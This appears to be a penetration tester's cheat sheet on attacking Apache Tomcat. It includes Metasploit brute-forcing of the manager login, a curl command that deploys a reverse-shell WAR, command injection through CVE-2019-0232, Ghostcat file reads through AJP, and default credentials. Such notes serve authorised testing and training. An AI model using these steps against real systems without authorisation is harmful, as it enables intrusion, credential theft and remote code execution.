Apache Tomcat

Apache Tomcat is an open-source web server. It provides a Java HTTP web server environment in which Java code can run.

Version 11 is still in development. The previous major versions are version 10 (2021), version 9 (2018), and version 8 (2016).

A Java web application can use servlets, JSPs, or both. A combination of both is the most common architecture.

  • Servlets ☕: the whole logic is in Java
  • JSP 🐲: HTML-like template files in which we can add Java logic to handle input and create interactive pages.

The admin panel used to upload applications is usually at /manager/html. To upload an application, you need to package it as a WAR archive. Each app is deployed at a URI, and index.jsp is loaded by default (otherwise an error is returned).


Pentester Notes ☠️

  • You can try tomcatWarDeployer (0.4k ⭐, 2022 🪦), but it's memory hungry, buggy, unstable, and you need to patch the code first 🪦. It's a multipurpose tool (from enumeration to exploitation, albeit basic).

Enumeration

  • You can use nmap. It often runs on port 8080.
$ sudo nmap IP -sCV -v
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
  • We can often recognize a website using Apache Tomcat from the presence of the JSESSIONID cookie. We may also trigger an error to see the layout of the error page. Additionally, the URI /docs may be available and expose the Tomcat version.

  • Spring Boot Actuators may be in use.

  • We can disclose the Tomcat version by sending a request with an invalid method, which should raise a 405 (e.g. curl -X PUT URL)

Foothold

  • If you close the login prompt, you may see default credentials

  • We can try to brute force the manager account using metasploit.

$ msfconsole -q
msf6> use auxiliary/scanner/http/tomcat_mgr_login
msf6> set RHOSTS <target>
msf6> set STOP_ON_SUCCESS true
msf6> set ANONYMOUS_LOGIN true
msf6> set BLANK_PASSWORDS true
msf6> run

Exploitation

  • If you have access to the manager, you can try to upload a reverse shell. Refer to reverse shell#tomcat for more information.

  • You can also try to use metasploit to upload a reverse shell

  • You can use cURL to upload a WAR too:

$ curl --upload-file revshell.war -u 'username:password' "URL/manager/text/deploy?path=/shell"

Well-known CVEs

  • CVE-2019-0232: on Windows hosts, if there is a CGI script and enableCmdLineArguments is enabled (disabled by default), it can be exploited to run arbitrary commands.

You must find the CGI directory which is often /cgi or /cgi-bin/ and find at least one script. Use URL/xxx/yyy.bat?&dir to execute dir.

  • Use + instead of spaces. Use \ in paths.
  • Don't forget to URL encode the payload.
  • Use redirections when needed (e.g. dir+>+output to create 'output').
  • Display environment variables using &set. If PATH is not set, you have to use the full path (e.g. c:\windows\system32\whoami.exe).

You can use the metasploit module tomcat_cgi_cmdlineargs.


Apache AJP

Apache AJP is a wire protocol. It allows a web server such as Apache to talk to Tomcat. A few notes:

  • 🐲 It runs on port 8009/TCP (by default)
  • 🪦 It's not often exposed
  • 📚 We need to configure a web server to communicate with it

While uncommon, if a Tomcat website is behind a firewall, but the AJP port is exposed, we can use AJP to access the 'hidden' Tomcat website.

AJP Exploitation

  • We can use nginx with nginx_ajp_module
  • We can use Apache with proxy_ajp
  • We can use AJPy (0.5k ⭐)
$ git clone https://github.com/hypn0s/AJPy.git && cd AJPy
$ python tomcat.py --port 8009 "version" IP
<print tomcat manager version>

AJP Well-known CVEs

  • CVE-2020-1938: unauthenticated LFI that can be used to read files in the webroot, such as WEB-INF/web.xml or WEB-INF/cgi/xxx.bat. Apache JServ, which usually runs on port 8009, must be exposed.

It can be exploited using metasploit:

msf6> use auxiliary/admin/http/tomcat_ghostcat

The file web.xml contains the manager credentials if they were defined.


👻 To-do 👻

Stuff that I found, but never read/used yet.

  • apache-tomcat-pentesting
  • Jetty - it seems like an alternative
  • /manager/status server status (admin:admin)
  • not the same credentials on each page
  • when uploading, on the same page, there is information about the server architecture, which we can use to fine tune the payload
  • jar -ft revshell.jar/jd-gui: to see metasploit endpoint name
  • when pressing ESC on login, it may print the message with the default credentials
  • /etc/tomcat9/<config files>
  • web.xml, tomcat-users.xml
  • SESSIONS.ser

While not really related:

  • /control/xmlrpc, /webtools/control/main, /control/checkLogin
  • Try default credentials (admin:ofbiz)
  • CVE-2023-50164 leads to RCE